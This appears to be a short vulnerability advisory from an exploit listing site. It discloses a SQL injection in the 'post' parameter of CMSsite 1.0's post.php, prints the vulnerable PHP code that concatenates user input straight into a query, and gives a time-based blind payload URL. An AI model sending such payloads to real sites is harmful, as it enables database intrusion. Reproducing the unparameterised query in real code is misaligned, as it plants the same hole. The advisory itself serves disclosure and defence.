CMSsite 1.0 post.php SQL Injection

2019.02.19

Credit: Mr Winst0n

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: CMSsite 1.0 - 'post' SQL Injection

# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1 


# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post

if (isset($_GET['post'])) {
	$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);



# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

CMSsite 1.0 post.php SQL Injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

CMSsite 1.0 post.php SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.